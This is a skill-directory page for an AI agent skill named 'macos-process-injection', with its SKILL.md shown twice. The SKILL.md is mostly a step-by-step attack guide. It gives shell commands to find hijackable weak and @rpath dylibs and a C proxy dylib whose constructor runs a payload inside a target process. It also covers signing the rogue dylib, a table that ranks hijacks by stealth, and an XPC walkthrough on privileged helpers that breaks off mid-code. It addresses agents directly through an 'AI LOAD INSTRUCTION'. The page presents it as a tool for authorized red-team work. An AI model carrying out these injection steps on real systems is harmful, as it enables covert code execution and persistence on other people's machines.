Macos Process Injection

Name: Macos Process Injection
Author: yaklang

yaklang/hack-skills

Walk through macOS dylib hijacking, rpath analysis, and XPC/Mach techniques when you are auditing native binaries or authorized red-team macOS work.

Overview

macos-process-injection is an agent skill for the Ship phase that documents step-by-step macOS dylib hijacking, rpath analysis, and related injection techniques for authorized security work.

Install

npx skills add https://github.com/yaklang/hack-skills --skill macos-process-injection

What is this skill?

Step-by-step dylib hijacking with DYLD_PRINT_RPATHS / DYLD_PRINT_LIBRARIES audit flows
Manual weak dylib and LC_RPATH enumeration via otool pipelines
Rpath-relative @rpath resolution order explained for writable-path hijack scenarios
Dylib proxy template section for constructing proxy load paths
Explicit pointer to parent SKILL.md for broader injection-vector overview
4 numbered methodology sections including dylib proxy template

Compatible agents: Claude Code, Cursor, Codex, any compatible agent

Adoption & trust: 1k installs on skills.sh; 987 GitHub stars; 0/3 security scanners passed (skills.sh audits).

What problem does it solve?

You need repeatable macOS native injection and dylib hijack discovery steps beyond a high-level vector list.

Who is it for?

Authorized macOS appsec reviews, red-team labs, or malware analysis where you must prove weak-dylib or rpath hijack feasibility with commands.

Skip if: Solo builders shipping a Flutter or web SaaS who only need App Store compliance basics—skip unless you explicitly own native macOS security testing.

When should I use this skill?

Load when you need detailed dylib hijacking methodology, XPC exploitation walkthroughs, or Mach port technique specifics and the main injection SKILL.md overview is already loaded.

What do I get? / Deliverables

You get shell-ready enumeration commands, rpath resolution logic, and proxy templates to document hijackable load paths in a target binary.

Dylib audit command transcripts
Enumerated hijackable weak dylib paths
Rpath resolution notes for @rpath imports

Recommended Skills

Azure Compliancemicrosoft/azure-skills

Azure Compliance is a Microsoft agent skill for solo builders and small teams who need structured security and complianc…373k installs·1.2k stars

Openclaw Secure Linux Cloudxixu-me/skills

OpenClaw Secure Linux Cloud guides a hardened VPS deployment—rootless Podman, loopback-only gateway, SSH-tunneled Contro…201k installs·61 stars

Entra Agent Idmicrosoft/azure-skills

entra-agent-id is a Microsoft-authored agent skill for provisioning and operating OAuth-capable identities tailored to A…99.1k installs·1.2k stars

Firebase Security Rules Auditorfirebase/agent-skills

Firebase Security Rules Auditor turns your agent into a senior penetration-style reviewer for Firestore rulesets. Solo b…40.3k installs·345 stars

Firestore Security Rules Auditorfirebase/agent-skills

Firestore-security-rules-auditor is a checker skill for solo builders and small teams shipping Firebase-backed apps who …20.3k installs·345 stars

Skill Vetteruseai-pro/openclaw-skills-security

Skill Vetter is a security-first OpenClaw agent skill that makes your coding agent behave like a pre-install auditor for…19.2k installs·62 stars

Journey fit

Primary fit

Canonical shelf is Ship → security because the skill documents exploitation and hardening discovery on macOS binaries before or during release hardening. Subphase security matches dylib hijacking, weak dylib enumeration, and injection-vector methodology rather than general debugging or DevOps.

Also useful

OperateIteration & experiments

How it compares

Use as a procedural security deep-dive, not a general Claude Code productivity or Flutter scaffolding skill.

Common Questions / FAQ

Who is macos-process-injection for?

Security engineers, macOS binary auditors, and authorized offensive-security practitioners who need dylib and XPC injection walkthroughs with concrete shell commands.

When should I use macos-process-injection?

Use it in Ship → security when hardening or assessing a macOS binary, during pre-release native audits, or in operate → iterate when investigating suspicious load behavior—only on systems you are allowed to test.

Is macos-process-injection safe to install?

Treat it as sensitive offensive-security documentation; review the Security Audits panel on this Prism page and your org policy before running any commands on real machines.

SKILL.md

READMESKILL.md - Macos Process Injection

# Dylib Hijacking & XPC Exploitation — Step-by-Step Techniques

> **AI LOAD INSTRUCTION**: Load this when you need detailed dylib hijacking methodology, XPC exploitation walkthroughs, or Mach port technique specifics. Assumes the main [SKILL.md](./SKILL.md) is already loaded for injection vector overview.

---

## 1. DYLIB HIJACKING METHODOLOGY

### 1.1 Automated Discovery with DyLibHijackScanner

```bash
# Using DYLD_PRINT_RPATHS and DYLD_PRINT_LIBRARIES for analysis
DYLD_PRINT_RPATHS=1 DYLD_PRINT_LIBRARIES=1 /path/to/binary 2>&1 | tee /tmp/dylib_audit.txt

# Parse for missing libraries
grep "not found" /tmp/dylib_audit.txt
```

### 1.2 Manual Weak Dylib Enumeration

```bash
# Step 1: List all load commands
otool -l /path/to/binary > /tmp/loadcmds.txt

# Step 2: Extract weak dylib paths
grep -A 2 LC_LOAD_WEAK_DYLIB /tmp/loadcmds.txt | grep name | awk '{print $2}'

# Step 3: Check which are missing
while read lib; do
  [ ! -f "$lib" ] && echo "HIJACKABLE: $lib"
done < <(grep -A 2 LC_LOAD_WEAK_DYLIB /tmp/loadcmds.txt | grep name | awk '{print $2}')
```

### 1.3 Rpath Analysis

```bash
# Step 1: Enumerate rpath entries (order matters!)
otool -l /path/to/binary | grep -A 2 LC_RPATH | grep path | awk '{print $2}'

# Step 2: Find rpath-relative imports
otool -L /path/to/binary | grep @rpath | awk '{print $1}'

# Step 3: Resolve each @rpath import against rpath entries in order
# First match wins — if earlier rpath dir is writable, you win
```

### 1.4 Complete Dylib Proxy Template

```c
// proxy.c — forwards all symbols to the real dylib while executing payload

#include <stdio.h>
#include <stdlib.h>
#include <dlfcn.h>

// Constructor runs when dylib is loaded
__attribute__((constructor))
static void payload(void) {
    // Avoid running in unintended processes
    const char *proc = getprogname();
    if (strcmp(proc, "target_process") != 0) return;

    // Execute payload
    system("/path/to/payload.sh");
}

// Build with reexport to maintain original functionality:
// gcc -dynamiclib -o hijacked.dylib proxy.c \
//   -Wl,-reexport_library,/path/to/original_real.dylib \
//   -arch x86_64 -arch arm64 \
//   -framework Foundation
```

### 1.5 Signing the Proxy Dylib

```bash
# If target binary has library validation disabled, ad-hoc signing suffices
codesign -s - hijacked.dylib

# If target requires same-team signing, need a valid Developer ID
codesign -s "Developer ID Application: ..." hijacked.dylib

# If target has no library validation at all, no signing needed
```

### 1.6 Dylib Hijacking Priority Matrix

| Hijack Type | Reliability | Stealth | Persistence | Prerequisite |
|---|---|---|---|---|
| Weak dylib (missing) | High | High | Per-launch | Writable target path |
| @rpath (writable prefix) | High | High | Per-launch | Writable rpath dir |
| Proxy (replace existing) | High | Medium | Per-launch | Writable dylib location + re-export |
| DYLD_INSERT_LIBRARIES | High | Low | Per-invocation | Env var entitlement |
| DYLD_LIBRARY_PATH override | Medium | Low | Per-invocation | No Hardened Runtime |

---

## 2. XPC EXPLOITATION WALKTHROUGH

### 2.1 Identifying XPC Services and Their Entitlements

```bash
# List all XPC services in an app bundle
find /Applications/Target.app -name "*.xpc" -type d

# Read the XPC service's Info.plist
plutil -p /Applications/Target.app/Contents/XPCServices/Helper.xpc/Contents/Info.plist

# Check launchd plist for Mach service name
cat /Library/LaunchDaemons/com.target.helper.plist | grep -A 1 MachServices

# Dump XPC service entitlements
codesign -d --entitlements :- /Applications/Target.app/Contents/XPCServices/Helper.xpc/Contents/MacOS/Helper
```

### 2.2 XPC Connection Interception

```objc
// Connecting to a third-party privileged helper
#import <Foundation/Foundation.h>

int main() {
    NSXPCConnection *conn = [[NSXPCConnection alloc]
        initWithMachServiceName:@"com.target.helper"
        options:NSXPCConnectionPrivileged];

    // Set the expected protocol interface
    conn.remoteObjec

What is this skill?

Step-by-step dylib hijacking with DYLD_PRINT_RPATHS / DYLD_PRINT_LIBRARIES audit flows

Manual weak dylib and LC_RPATH enumeration via otool pipelines

Rpath-relative @rpath resolution order explained for writable-path hijack scenarios

Dylib proxy template section for constructing proxy load paths

Explicit pointer to parent SKILL.md for broader injection-vector overview

4 numbered methodology sections including dylib proxy template

Compatible agents: Claude Code, Cursor, Codex, any compatible agent

Adoption & trust: 1k installs on skills.sh; 987 GitHub stars; 0/3 security scanners passed (skills.sh audits).

Who is it for?

Authorized macOS appsec reviews, red-team labs, or malware analysis where you must prove weak-dylib or rpath hijack feasibility with commands.

Skip if: Solo builders shipping a Flutter or web SaaS who only need App Store compliance basics—skip unless you explicitly own native macOS security testing.

Journey fit

Primary fit

Also useful

OperateIteration & experiments

SKILL.md

READMESKILL.md - Macos Process Injection

# Dylib Hijacking & XPC Exploitation — Step-by-Step Techniques

> **AI LOAD INSTRUCTION**: Load this when you need detailed dylib hijacking methodology, XPC exploitation walkthroughs, or Mach port technique specifics. Assumes the main [SKILL.md](./SKILL.md) is already loaded for injection vector overview.

---

## 1. DYLIB HIJACKING METHODOLOGY

### 1.1 Automated Discovery with DyLibHijackScanner

```bash
# Using DYLD_PRINT_RPATHS and DYLD_PRINT_LIBRARIES for analysis
DYLD_PRINT_RPATHS=1 DYLD_PRINT_LIBRARIES=1 /path/to/binary 2>&1 | tee /tmp/dylib_audit.txt

# Parse for missing libraries
grep "not found" /tmp/dylib_audit.txt
```

### 1.2 Manual Weak Dylib Enumeration

```bash
# Step 1: List all load commands
otool -l /path/to/binary > /tmp/loadcmds.txt

# Step 2: Extract weak dylib paths
grep -A 2 LC_LOAD_WEAK_DYLIB /tmp/loadcmds.txt | grep name | awk '{print $2}'

# Step 3: Check which are missing
while read lib; do
  [ ! -f "$lib" ] && echo "HIJACKABLE: $lib"
done < <(grep -A 2 LC_LOAD_WEAK_DYLIB /tmp/loadcmds.txt | grep name | awk '{print $2}')
```

### 1.3 Rpath Analysis

```bash
# Step 1: Enumerate rpath entries (order matters!)
otool -l /path/to/binary | grep -A 2 LC_RPATH | grep path | awk '{print $2}'

# Step 2: Find rpath-relative imports
otool -L /path/to/binary | grep @rpath | awk '{print $1}'

# Step 3: Resolve each @rpath import against rpath entries in order
# First match wins — if earlier rpath dir is writable, you win
```

### 1.4 Complete Dylib Proxy Template

```c
// proxy.c — forwards all symbols to the real dylib while executing payload

#include <stdio.h>
#include <stdlib.h>
#include <dlfcn.h>

// Constructor runs when dylib is loaded
__attribute__((constructor))
static void payload(void) {
    // Avoid running in unintended processes
    const char *proc = getprogname();
    if (strcmp(proc, "target_process") != 0) return;

    // Execute payload
    system("/path/to/payload.sh");
}

// Build with reexport to maintain original functionality:
// gcc -dynamiclib -o hijacked.dylib proxy.c \
//   -Wl,-reexport_library,/path/to/original_real.dylib \
//   -arch x86_64 -arch arm64 \
//   -framework Foundation
```

### 1.5 Signing the Proxy Dylib

```bash
# If target binary has library validation disabled, ad-hoc signing suffices
codesign -s - hijacked.dylib

# If target requires same-team signing, need a valid Developer ID
codesign -s "Developer ID Application: ..." hijacked.dylib

# If target has no library validation at all, no signing needed
```

### 1.6 Dylib Hijacking Priority Matrix

| Hijack Type | Reliability | Stealth | Persistence | Prerequisite |
|---|---|---|---|---|
| Weak dylib (missing) | High | High | Per-launch | Writable target path |
| @rpath (writable prefix) | High | High | Per-launch | Writable rpath dir |
| Proxy (replace existing) | High | Medium | Per-launch | Writable dylib location + re-export |
| DYLD_INSERT_LIBRARIES | High | Low | Per-invocation | Env var entitlement |
| DYLD_LIBRARY_PATH override | Medium | Low | Per-invocation | No Hardened Runtime |

---

## 2. XPC EXPLOITATION WALKTHROUGH

### 2.1 Identifying XPC Services and Their Entitlements

```bash
# List all XPC services in an app bundle
find /Applications/Target.app -name "*.xpc" -type d

# Read the XPC service's Info.plist
plutil -p /Applications/Target.app/Contents/XPCServices/Helper.xpc/Contents/Info.plist

# Check launchd plist for Mach service name
cat /Library/LaunchDaemons/com.target.helper.plist | grep -A 1 MachServices

# Dump XPC service entitlements
codesign -d --entitlements :- /Applications/Target.app/Contents/XPCServices/Helper.xpc/Contents/MacOS/Helper
```

### 2.2 XPC Connection Interception

```objc
// Connecting to a third-party privileged helper
#import <Foundation/Foundation.h>

int main() {
    NSXPCConnection *conn = [[NSXPCConnection alloc]
        initWithMachServiceName:@"com.target.helper"
        options:NSXPCConnectionPrivileged];

    // Set the expected protocol interface
    conn.remoteObjec

Overview

Install

What is this skill?

What problem does it solve?

Who is it for?

When should I use this skill?

What do I get? / Deliverables

Recommended Skills

Journey fit

Who is macos-process-injection for?

When should I use macos-process-injection?

Is macos-process-injection safe to install?

SKILL.md

This week for builders

Overview

Install

What is this skill?

What problem does it solve?

Who is it for?

When should I use this skill?

What do I get? / Deliverables

Recommended Skills

Journey fit

Who is macos-process-injection for?

When should I use macos-process-injection?

Is macos-process-injection safe to install?

SKILL.md